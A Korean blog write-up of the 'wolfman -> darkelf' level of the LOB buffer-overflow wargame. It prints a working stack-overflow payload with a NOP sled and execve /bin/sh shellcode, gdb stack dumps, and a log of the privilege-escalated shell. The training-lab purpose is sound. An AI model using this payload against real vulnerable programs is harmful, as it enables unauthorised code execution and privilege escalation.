A ㅏ... 월요일 새벽 상쾌함의 극치를 달렸다.
마땅히 손에 잡히는것도 없고해서 BOF원정대를 풀려고햇는데 Aㅏ...
쉘코드넣었는데 한방에 풀렸다 아하하하핳 자반볶음에 밥비벼먹어야지
이번에는 argv[1]의 길이를 제한했었는데 argv[2]에 쉘코드넣고 리턴어드레스만 그쪽으로 돌려놨다
페이로드는 다음과 같다
`python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
좀 잘린 로그...랄까?
Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\xec\x
fc\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68
\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜賃옜
Breakpoint 1, 0x8048617 in main ()
(gdb) x/100x $esp-100
0xbffffb28: 0xfffffe7d 0x4005d920 0x400143e0 0xbffffb4c
0xbffffb38: 0x40066070 0x40106980 0x4000ae60 0xbffffbd4
0xbffffb48: 0xbffffb88 0x08048613 0xbffffb60 0x00000000
0xbffffb58: 0x00000028 0x00000013 0x00000000 0x00000000
0xbffffb68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb88: 0xbfbfbfbf 0xbfbffcec 0x00000000 0xbffffbd4
0xbffffb98: 0xbffffbe4 0x40013868 0x00000003 0x08048450
0xbffffba8: 0x00000000 0x08048471 0x08048500 0x00000003
0xbffffbb8: 0xbffffbd4 0x08048390 0x0804864c 0x4000ae60
0xbffffbc8: 0xbffffbcc 0x40013e90 0x00000003 0xbffffcc7
0xbffffbd8: 0xbffffce2 0xbffffd13 0x00000000 0xbffffe58
0xbffffbe8: 0xbffffe7a 0xbffffe84 0xbffffe92 0xbffffeb1
0xbffffbf8: 0xbffffec1 0xbffffeda 0xbffffef7 0xbfffff01
0xbffffc08: 0xbfffff0f 0xbfffff52 0xbfffff65 0xbfffff7a
0xbffffc18: 0xbfffff8a 0xbfffff97 0xbfffffb6 0xbfffffc1
0xbffffc28: 0xbfffffce 0xbfffffd6 0x00000000 0x00000003
0xbffffc38: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffc48: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffc58: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffc68: 0x08048450 0x0000000b 0x000001f9 0x0000000c
0xbffffc78: 0x000001f9 0x0000000d 0x000001f9 0x0000000e
0xbffffc88: 0x000001f9 0x00000010 0x0febfbff 0x0000000f
0xbffffc98: 0xbffffcc2 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffca8: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
(gdb) x/100x $esp-500
0xbffff998: 0x40000000 0x00000000 0x400139d0 0x00000000
0xbffff9a8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff9b8: 0x40013a08 0x40013a00 0x400139d8 0x400139e0
0xbffff9c8: 0x400139e8 0x00000000 0x00000000 0x00000000
0xbffff9d8: 0x400139f0 0x400139f8 0x00000000 0x00000000
0xbffff9e8: 0x400139d0 0x40029b0e 0xbffffac0 0x400081e6
0xbffff9f8: 0x40029ad5 0x40029ad5 0x40013868 0x400143e0
0xbffffa08: 0x00004388 0x40013868 0x40029b0e 0xbffffae4
0xbffffa18: 0x400081e6 0x40029ad5 0x40029ad5 0x40013868
0xbffffa28: 0x400143e0 0x0000785c 0x400081e6 0x40029ad5
0xbffffa38: 0x080482f9 0x40013868 0x40013ed0 0x00000021
0xbffffa48: 0x00000075 0x4001ad70 0x00007080 0x40029b0e
0xbffffa58: 0xbffffb28 0x00000000 0x40029ad5 0x40021df0
0xbffffa68: 0x00000708 0x40021fd0 0x4001ad70 0x400143e0
0xbffffa78: 0x00000003 0x40014650 0x00000001 0xbffffa9c
0xbffffa88: 0x40021df0 0x400145e4 0x0d790266 0xbffffb18
0xbffffa98: 0x4002982c 0x40021df0 0x400143e0 0x400140d4
0xbffffaa8: 0x077905a6 0xbffffb30 0x08048275 0x4001b630
0xbffffab8: 0x400143e0 0x400143e0 0x40014650 0x00000001
0xbffffac8: 0xbffffae0 0x08048184 0x400140d4 0x078e530f
0xbffffad8: 0xbffffb5c 0x080482d0 0x40021ca0 0xbffffb1c
0xbffffae8: 0x4000a7fd 0x400143d0 0x400146b0 0x00000007
0xbffffaf8: 0x4000a74e 0x401081ec 0x4000ae60 0xbffffbd4
0xbffffb08: 0x400143e0 0x40021df0 0x401088c0 0x4002982c
---Type <return> to continue, or q <return> to quit---
0xbffffb18: 0x40021df0 0xbffffb4c 0x4000a970 0xbffffd13
(gdb) x/100x $ebp-300
0xbfbfbe93: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbea3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbeb3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbec3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbed3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbee3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbef3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf03: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf13: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf23: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf33: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf43: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf53: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf63: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf73: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf83: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf93: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfa3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfb3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfc3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfd3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfe3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbff3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfc003: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbfbfc013: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/100x $ebp-300
0xbfbfbe93: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbea3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbeb3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbec3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbed3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbee3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbef3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf03: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf13: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf23: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf33: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf43: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf53: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf63: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf73: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf83: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbf93: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfa3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfb3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfc3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfd3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbfe3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfbff3: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfbfc003: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbfbfc013: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/300wx $esp
0xbffffb8c: 0xbfbffcec 0x00000000 0xbffffbd4 0xbffffbe4
0xbffffb9c: 0x40013868 0x00000003 0x08048450 0x00000000
0xbffffbac: 0x08048471 0x08048500 0x00000003 0xbffffbd4
0xbffffbbc: 0x08048390 0x0804864c 0x4000ae60 0xbffffbcc
0xbffffbcc: 0x40013e90 0x00000003 0xbffffcc7 0xbffffce2
0xbffffbdc: 0xbffffd13 0x00000000 0xbffffe58 0xbffffe7a
0xbffffbec: 0xbffffe84 0xbffffe92 0xbffffeb1 0xbffffec1
0xbffffbfc: 0xbffffeda 0xbffffef7 0xbfffff01 0xbfffff0f
0xbffffc0c: 0xbfffff52 0xbfffff65 0xbfffff7a 0xbfffff8a
0xbffffc1c: 0xbfffff97 0xbfffffb6 0xbfffffc1 0xbfffffce
0xbffffc2c: 0xbfffffd6 0x00000000 0x00000003 0x08048034
0xbffffc3c: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffc4c: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffc5c: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffc6c: 0x0000000b 0x000001f9 0x0000000c 0x000001f9
0xbffffc7c: 0x0000000d 0x000001f9 0x0000000e 0x000001f9
0xbffffc8c: 0x00000010 0x0febfbff 0x0000000f 0xbffffcc2
0xbffffc9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcbc: 0x00000000 0x36690000 0x2f003638 0x656d6f68
0xbffffccc: 0x6c6f772f 0x6e616d66 0x706d742f 0x7474612f
0xbffffcdc: 0x6d6b6361 0xbfbf0065 0xbfbfbfbf 0xbfbfbfbf
0xbffffcec: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffcfc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
---Type <return> to continue, or q <return> to quit---
0xbffffd0c: 0xfcecbfbf 0x9000bfbf 0x90909090 0x90909090
0xbffffd1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd5c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd8c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd9c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdbc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdcc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffddc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdfc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe3c: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f
0xbffffe4c: 0x5350e389 0xb099e189 0x0080cd0b 0x00000000
0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) q
The program is running. Exit anyway? (y or n) y
[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xb
f"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62
\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bash: ./darkelf: No such file or directory
[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\x
bf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x6
2\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l
?egmentation fault (core dumped)
[wolfman@localhost tmp]$ gdb -q core
"/home/wolfman/tmp/core": not in executable format: File format not recognized
(gdb) disas main
No symbol table is loaded. Use the "file" command.
(gdb) q
[wolfman@localhost tmp]$ gdb -q attackme
(gdb) b *main+279
Breakpoint 1 at 0x8048617
(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xff\xbf"'` `python -c 'print "\x9
0"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x8
9\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/wolfman/tmp/attackme `python -c 'print "\xbf"*44+"\x6c\x
fd\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68
\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l
?reakpoint 1, 0x8048617 in main ()
(gdb) x/330wx $esp
0xbffffb8c: 0x4000fd6c 0x00000004 0xbffffbd4 0xbffffbe8
0xbffffb9c: 0x40013868 0x00000004 0x08048450 0x00000000
0xbffffbac: 0x08048471 0x08048500 0x00000004 0xbffffbd4
0xbffffbbc: 0x08048390 0x0804864c 0x4000ae60 0xbffffbcc
0xbffffbcc: 0x40013e90 0x00000004 0xbffffcc7 0xbffffce2
0xbffffbdc: 0xbffffd11 0xbffffd13 0x00000000 0xbffffe58
0xbffffbec: 0xbffffe7a 0xbffffe84 0xbffffe92 0xbffffeb1
0xbffffbfc: 0xbffffec1 0xbffffeda 0xbffffef7 0xbfffff01
0xbffffc0c: 0xbfffff0f 0xbfffff52 0xbfffff65 0xbfffff7a
0xbffffc1c: 0xbfffff8a 0xbfffff97 0xbfffffb6 0xbfffffc1
0xbffffc2c: 0xbfffffce 0xbfffffd6 0x00000000 0x00000003
0xbffffc3c: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffc4c: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffc5c: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffc6c: 0x08048450 0x0000000b 0x000001f9 0x0000000c
0xbffffc7c: 0x000001f9 0x0000000d 0x000001f9 0x0000000e
0xbffffc8c: 0x000001f9 0x00000010 0x0febfbff 0x0000000f
0xbffffc9c: 0xbffffcc2 0x00000000 0x00000000 0x00000000
0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcbc: 0x00000000 0x36690000 0x2f003638 0x656d6f68
0xbffffccc: 0x6c6f772f 0x6e616d66 0x706d742f 0x7474612f
0xbffffcdc: 0x6d6b6361 0xbfbf0065 0xbfbfbfbf 0xbfbfbfbf
0xbffffcec: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffcfc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
---Type <return> to continue, or q <return> to quit---
0xbffffd0c: 0xfd6cbfbf 0x9000bf00 0x90909090 0x90909090
0xbffffd1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd5c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd8c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffd9c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdbc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdcc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffddc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffdfc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe3c: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f
0xbffffe4c: 0x5350e389 0xb099e189 0x0080cd0b 0x00000000
0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffe8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff4c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffcc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffdc: 0x00000000 0x6f682f00 0x772f656d 0x6d666c6f
0xbfffffec: 0x742f6e61 0x612f706d 0x63617474 0x00656d6b
0xbffffffc: 0x00000000 Cannot access memory at address 0xc0000000
(gdb)
(gdb) q
The program is running. Exit anyway? (y or n) y
[wolfman@localhost tmp]$ bash2
[wolfman@localhost tmp]$ ./attackme `python -c 'print "\xbf"*44+"\x6c\xfd\xff\x
bf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x6
2\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?
풺ash$ id
uid=505(wolfman) gid=505(wolfman) groups=505(wolfman)
bash$ q
sh: q: command not found
bash$ exit
exit
[wolfman@localhost tmp]$ cd ../
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "\xbf"*44+"\x6c\xfd\xf
f\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f
\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜l?
풺ash$ id
uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505
(wolfman)
bash$ whoami
darkelf
bash$ my-pass
euid = 506
kernel crashed
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| orge -> troll (0) | 2014.02.20 |
|---|---|
| darkelf->orge (0) | 2014.02.20 |
| orc -> wolfman (0) | 2014.02.20 |
| gremlin -> cobolt (0) | 2014.02.20 |
| gate -> gremlin (0) | 2014.02.20 |
